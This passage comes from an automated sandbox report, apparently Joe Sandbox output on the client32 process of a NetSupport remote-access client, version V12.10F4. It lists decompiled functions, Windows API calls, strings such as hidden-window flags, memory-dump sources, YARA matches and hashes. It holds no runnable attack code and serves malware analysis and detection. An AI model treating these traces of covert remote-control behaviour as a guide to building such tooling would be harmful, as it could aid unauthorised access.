                                                                                                                                                                                                    • _malloc_crt.MSVCR100(-00000005,?,?,?,?,?,00000001,00000000), ref: 687E6B35
                                                                                                                                                                                                      • Part of subcall function 687E0B31: malloc.MSVCR100(00000001,00000001,00000001,?,687EA974,00000018,687EA948,0000000C,688074F7,00000001,00000001,?,687E1EE5,0000000D), ref: 687E0B3D
                                                                                                                                                                                                    • memcpy.MSVCR100(?,?,00000006,?,?,?,?,00000001,00000000), ref: 687E6B83
                                                                                                                                                                                                    • strcpy_s.MSVCR100(?,?,?,?,?,00000006,?,?,?,?,00000001,00000000), ref: 687E6BAC
                                                                                                                                                                                                    • memcpy.MSVCR100(?,?,00000006,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 687E6BE6
                                                                                                                                                                                                    • _CRT_RTC_INITW.MSVCR100(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 687E6C12
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(00000000), ref: 687E6C3B
                                                                                                                                                                                                    • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 68810C5C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptdmemcpystrcpy_s$DecrementInterlockedStringType___crt__invoke_watson_malloc_crt_strlenmallocmemcmpstrcmp
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2195150593-0
                                                                                                                                                                                                    • Opcode ID: c698a9c5b700b96da38e228ff9f6470614a8828958c5a1015ca90e7007f95b60
                                                                                                                                                                                                    • Instruction ID: 2ad41e502cc803fe1bc03e27a2efe6d7389ae33fe6535582395a98f89b34572e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c698a9c5b700b96da38e228ff9f6470614a8828958c5a1015ca90e7007f95b60
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FA10875A002199FDB25CF28CD98BE9B7B5FF49304F5044A9E61DE7250EB30AA91CF60
                                                                                                                                                                                                    Function 1112D530 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 187COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,11136285,00000000,?,?), ref: 1112D638
                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000,?,11136285,00000000,?,?), ref: 1112D667
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastShowWindow
                                                                                                                                                                                                    • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                                                                                                                                                    • API String ID: 3252650109-4091810678
                                                                                                                                                                                                    • Opcode ID: cd1c5dd9d1a3bb181a6b56db3fe8ce8364c259ea6c9d772f7103b6a17e3b32b4
                                                                                                                                                                                                    • Instruction ID: fa0dcf7bfd4a991f80e84da17f5d1f9dbb64edff6fc809840f3415ca9232f2cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd1c5dd9d1a3bb181a6b56db3fe8ce8364c259ea6c9d772f7103b6a17e3b32b4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A761E371B40315AFEB11CBD4CC85F6AF7A5E744B18F604129F625AB2C4EAB16840CB85
                                                                                                                                                                                                    Function 687ECBFC Relevance: 19.6, APIs: 13, Instructions: 145COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcsnlen.MSVCR100(?,?,?,?,?,?,?,?,687ECC8D,?,?,?), ref: 687ECC20
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,?,?,?,?,687ECC8D,?,?,?), ref: 6880C847
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,687ECC8D,?,?,?), ref: 6880C851
                                                                                                                                                                                                    • ___crtLCMapStringW.LIBCMT(?,00000200,?,000000FF,00000000,00000000,?,?,?,?,?,?,687ECC8D,?,?,?), ref: 6880C86E
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,687ECC8D,?,?,?), ref: 6880C87F
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,687ECC8D,?,?,?), ref: 6880C88A
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,687ECC8D,?,?,?), ref: 6880C8A0
                                                                                                                                                                                                    • malloc.MSVCR100(00000008,?,?,687ECC8D,?,?,?), ref: 6880C8D8
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,687ECC8D,?,?,?), ref: 6880C8F4
                                                                                                                                                                                                    • ___crtLCMapStringW.LIBCMT(?,00000200,?,000000FF,00000000,00000000,?,?,687ECC8D,?,?,?), ref: 6880C90F
                                                                                                                                                                                                    • wcscpy_s.MSVCR100(?,?,00000000,?,?,?,?,?,?,?,?,687ECC8D,?,?,?), ref: 6880C920
                                                                                                                                                                                                    • _freea_s.MSVCR100(00000000,?,?,?,?,?,?,?,?,687ECC8D,?,?,?), ref: 6880C939
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$String___crt$_freea_s_invalid_parameter_noinfomallocwcscpy_swcsnlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4082481270-0
                                                                                                                                                                                                    • Opcode ID: a73b84564032e81ca5f76feaaa2f9143374db121b2572676fe87ebd0858b8611
                                                                                                                                                                                                    • Instruction ID: 6d59b7e9caa34b71d4b2b71a225e8905188bd402a622bf8149d2af7f9bf5632f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a73b84564032e81ca5f76feaaa2f9143374db121b2572676fe87ebd0858b8611
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29413675A14104EFE7145FACCC8C93E37E6EF46314B90492AF524DB292EB348D4097B9
                                                                                                                                                                                                    Function 1100D220 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                                    • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                                                                                                                                    • API String ID: 2111968516-2092292787
                                                                                                                                                                                                    • Opcode ID: bba3f28cac02fdec35f39604ef1b7e8ddb146cd2578dacf2bc8be98a87cc9d04
                                                                                                                                                                                                    • Instruction ID: 3cf3aa25874edefcff3c72479187094ffc842d22b257f1b299c377845cd1dbea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bba3f28cac02fdec35f39604ef1b7e8ddb146cd2578dacf2bc8be98a87cc9d04
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCF06C3A68111D57AB0187ED780547EF38D678057D7C8809AF8BCEBE20E912DCE0A296
                                                                                                                                                                                                    Function 110FD230 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 247libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(user32,?,?,?,?,00000000), ref: 110FD3AD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetGUIThreadInfo), ref: 110FD3C5
                                                                                                                                                                                                    • _memset.LIBCMT ref: 110FD3E2
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,SendInput), ref: 110FD43A
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000), ref: 110FD526
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressLibraryProc$FreeLoad_memset
                                                                                                                                                                                                    • String ID: 0$GetGUIThreadInfo$SendInput$user32
                                                                                                                                                                                                    • API String ID: 530983809-271338563
                                                                                                                                                                                                    • Opcode ID: be1e91ac694330f965b28f15093c1c5f42510e737a99044b1ed0c3d2e03dee73
                                                                                                                                                                                                    • Instruction ID: 43fa602a4ac72add29387a7c175e2a735ec2c38defe54f2081db145d70293a55
                                                                                                                                                                                                    • Opcode Fuzzy Hash: be1e91ac694330f965b28f15093c1c5f42510e737a99044b1ed0c3d2e03dee73
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBA1A270E043A69FDB16CF64CC85BADBBF9FB44708F0081A9E52897284DB759A84CF51
                                                                                                                                                                                                    Function 110FD040 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 155threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • GetLastError.KERNEL32(Client,00000000,00000001,00000000), ref: 110FD146
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110FD17C
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110FD18A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentThread$ErrorLast__wcstoi64
                                                                                                                                                                                                    • String ID: *Log_%d$@r$Client$Event. %s$LogWhileConnected$PLATFORM.CPP$nstrings <= 4
                                                                                                                                                                                                    • API String ID: 2021241812-3004467057
                                                                                                                                                                                                    • Opcode ID: eb309260b65eb184e950d2832ff89cbda71d3e6208cd11c1851e8b991c9664c9
                                                                                                                                                                                                    • Instruction ID: fb898e99375fe03a3fe41083e55742ce7b0b576ff4a7e429a818e7135f918612
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb309260b65eb184e950d2832ff89cbda71d3e6208cd11c1851e8b991c9664c9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72514935E00117ABDB11CFA5CC86FBEBBA9FF85718F104579F92597280E734A80187A1
                                                                                                                                                                                                    Function 1105D190 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 130windowregistryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegisterClassA.USER32(111E9674), ref: 1105D1F2
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,NSMCobrProxy,11190240,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1105D233
                                                                                                                                                                                                    • SetPropA.USER32(?,NSMCobrProxy,00000000), ref: 1105D2BD
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,?,00000000,00000000), ref: 1105D2E0
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 1105D2F6
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 1105D2FC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ClassCreateDispatchErrorExitLastProcessPropRegisterTranslateWindowwsprintf
                                                                                                                                                                                                    • String ID: CobrowseProxy.cpp$CobrowseProxy::RunCobrowse$NSMCobrProxy$_bOK$m_hAppWin
                                                                                                                                                                                                    • API String ID: 13347155-1383313024
                                                                                                                                                                                                    • Opcode ID: 37c3c3e8957f14a7e3b355c897228082546cf523f8d38056e85fd5e1210056e5
                                                                                                                                                                                                    • Instruction ID: 0f733430d951bad01d0579ae861b00247f75b5e4436af6dec06e8f89504007ad
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37c3c3e8957f14a7e3b355c897228082546cf523f8d38056e85fd5e1210056e5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3341F1B5E0074AABD761DFA5CC84F9FFBA5AB44758F10842AF91697280EA30E440CB61
                                                                                                                                                                                                    Function 110290F0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 97windowCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 11140450: GetTickCount.KERNEL32 ref: 111404B8
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • _strrchr.LIBCMT ref: 110291E5
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Assert. File %hs, line %d, err %d, Expr %s, xrefs: 11029126
                                                                                                                                                                                                    • Info. assert, restarting..., xrefs: 1102920D
                                                                                                                                                                                                    • Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s, xrefs: 11029151
                                                                                                                                                                                                    • Client32, xrefs: 11029185
                                                                                                                                                                                                    • V12.10F4, xrefs: 11029143
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExitProcess$CountErrorLastMessageTick_strrchrwsprintf
                                                                                                                                                                                                    • String ID: Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s$Assert. File %hs, line %d, err %d, Expr %s$Client32$Info. assert, restarting...$V12.10F4
                                                                                                                                                                                                    • API String ID: 2763122592-3703414834
                                                                                                                                                                                                    • Opcode ID: 46b0b576eeee1707cfa4597fddd227d26b12d5d0a7ecbe0e050bda6c28fca704
                                                                                                                                                                                                    • Instruction ID: 0c35b4c0934c547b9efc755c54c54cf2bc7aea1eab2dc2738ce497f42af58575
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46b0b576eeee1707cfa4597fddd227d26b12d5d0a7ecbe0e050bda6c28fca704
